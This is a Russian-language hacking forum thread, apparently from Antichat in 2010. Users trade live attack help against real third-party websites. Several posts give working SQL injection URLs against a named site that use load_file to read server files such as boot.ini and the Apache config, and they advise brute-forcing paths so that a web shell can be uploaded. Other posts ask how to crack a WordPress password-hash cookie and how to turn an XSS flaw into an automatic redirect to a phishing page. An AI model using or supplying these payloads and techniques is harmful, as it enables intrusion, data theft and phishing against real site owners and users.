ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11811  
Старый 05.03.2010, 20:41
SeNaP
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342

Репутация: 165
По умолчанию

Всем привет
можно ли это как нибудь обойти?
PHP код:
$kat htmlspecialchars($kat); 
$kat str_replace('.','',$kat); 
$kat str_replace('/','',$kat); 

if (
$_GET[file]) 

file("$kat/$file1");

 
Ответить с цитированием

  #11812  
Старый 05.03.2010, 20:48
LokbatanLi
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319

Репутация: -16
Отправить сообщение для LokbatanLi с помощью ICQ
По умолчанию

Цитата:
http://www.mission.am/am/past/program.php?ID=-1+union+select+1,fi le_priv,3,4 ,5,6,7,8,9,10,11,12 +from+mysql.user
pojalusta pmoqite kak mojno zalivat shell ??
 
Ответить с цитированием

  #11813  
Старый 05.03.2010, 20:57
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

Код:
http://www.mission.am/am/past/program.php?ID=-1+union+select+1,load_file('c:/boot.ini'),3,4,5,6,7,8,9,10,11,12+from+mysql.user
искать абсолютные пути, брутить
 
Ответить с цитированием

  #11814  
Старый 05.03.2010, 21:00
LokbatanLi
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319

Репутация: -16
Отправить сообщение для LokbatanLi с помощью ICQ
По умолчанию

Pashkela , izvini a kak i qde brutit ??

kak moqu uznat drugie puti ??
 
Ответить с цитированием

  #11815  
Старый 05.03.2010, 22:14
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

просто брутить, известными программами или своим скриптом *тулза умеет, только для винды там словарь говеный*
 
Ответить с цитированием

  #11816  
Старый 05.03.2010, 23:27
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Цитата:
Сообщение от Pashkela  
просто брутить, известными программами или своим скриптом *тулза умеет, только для винды там словарь говеный*
Паша, тебе лишь-бы логи засрать своей чудо программой.
Ну сколько-же тебя просить не учить людей всякой херне =\

LokbatanLi
http://www.mission.am/am/past/program.php?ID=-1+union+select+1,load_file('C:/Program Files/Apache Group/Apache2/conf/httpd.conf'),3,4,5,6,7,8,9,10,11,12+from+mysql.use r
Цитата:
ServerName mission.am
DocumentRoot htdocs/mission
http://www.mission.am/am/past/program.php?ID=-1+union+select+1,load_file('C:/Program Files/Apache Group/Apache2/htdocs/mission/index.php'),3,4,5,6,7,8,9,10,11,12+from+mysql.user

PS Если там "случайно" окажется дефейс от турецких хакеров, ты тут больше советов не проси пожалуйста
 
Ответить с цитированием

  #11817  
Старый 05.03.2010, 23:39
[Raz0r]
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717

Репутация: 1980
Отправить сообщение для [Raz0r] с помощью ICQ
По умолчанию

Цитата:
Сообщение от total90  
есть строчка такого рода:

Код:
wordpress_test_cookie=WP+Cookie+check;%20wordpressuser_4660020b7a87d7619827cd8098d2d654=Spider;%20wordpresspass_4660020b7a87d7619827cd8098d2d654=febc22cb6c4923d9271a857fc9ea2f7d

как отсюда выдернуть кукисы или мд5 хеш пароля?мб онлайн дешифратор какой-то?
судя по всему куки от wp <2.5, там пароль хранится в wordpresspass алгоритмом md5(md5())
 
Ответить с цитированием

  #11818  
Старый 06.03.2010, 06:19
z0mbie86
Новичок
Регистрация: 25.07.2009
Сообщений: 10
Провел на форуме:
71531

Репутация: 0
По умолчанию

У меня имееться xss. Я сделал чтобы была автоматическая переадресация на мой фейк таким образом:
Код HTML:
style=background:url('//') onerror=document.write
Но это работает только в опере

Для ie & firefox я сделал чтобы при наведении на текст переадресовывало на фейк:
Код HTML:
onmouseover=document.write
Как сделать чтоб переадресация была автоматически в ie & firefox?
 
Ответить с цитированием

  #11819  
Старый 06.03.2010, 07:30
LokbatanLi
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319

Репутация: -16
Отправить сообщение для LokbatanLi с помощью ICQ
По умолчанию

Цитата:
Сообщение от Jokester  
Паша, тебе лишь-бы логи засрать своей чудо программой.
Ну сколько-же тебя просить не учить людей всякой херне =\

LokbatanLi
http://www.mission.am/am/past/program.php?ID=-1+union+select+1,load_file('C:/Program Files/Apache Group/Apache2/conf/httpd.conf'),3,4,5,6,7,8,9,10,11,12+from+mysql.use r

http://www.mission.am/am/past/program.php?ID=-1+union+select+1,load_file('C:/Program Files/Apache Group/Apache2/htdocs/mission/index.php'),3,4,5,6,7,8,9,10,11,12+from+mysql.user

PS Если там "случайно" окажется дефейс от турецких хакеров, ты тут больше советов не проси пожалуйста
net ne za defeysom sprasu..

prosto ne moqu nayti path shtobi shell zalivat ??

a dalse kto pomojet ??
 
Ответить с цитированием

  #11820  
Старый 06.03.2010, 10:09
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

Цитата:
Сообщение от LokbatanLi  
net ne za defeysom sprasu..

prosto ne moqu nayti path shtobi shell zalivat ??

a dalse kto pomojet ??

Тебе ж дали путь.

На всякий случай почитай http://forum.antichat.ru/thread104591.html
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ